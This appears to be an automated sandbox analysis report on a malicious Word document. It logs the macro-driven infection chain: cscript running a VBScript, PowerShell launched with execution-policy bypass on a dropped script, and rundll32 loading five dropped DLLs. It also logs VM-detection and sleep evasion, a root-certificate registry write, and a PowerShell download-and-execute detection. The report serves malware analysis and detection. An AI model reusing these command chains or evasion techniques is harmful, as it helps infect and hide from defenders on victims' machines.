Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: sample.doc.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$mple.doc.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREE34.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@25/19@5/4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Binary or memory string: .VBPud<_

Source: sample.doc.doc	OLE document summary: title field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: sample.doc.doc	Stream path 'Macros/VBA/Module1' : High number of string operations
Source: sample.doc.doc	Stream path 'Macros/VBA/Module2' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Module1	Name: Module1
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Module2	Name: Module2
Source: ~DF77272A7F6F18B150.TMP.0.dr	Stream path 'VBA/Module1' : High number of string operations
Source: ~DF77272A7F6F18B150.TMP.0.dr	Stream path 'VBA/Module2' : High number of string operations

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_000007FF00260F5C sldt word ptr [eax]

3_2_000007FF00260F5C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000003.00000002.480149738.00000000003F2000.00000004.00000020.sdmp

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute

Source: Yara match	File source: sample.doc.doc, type: SAMPLE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\www.ps1, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
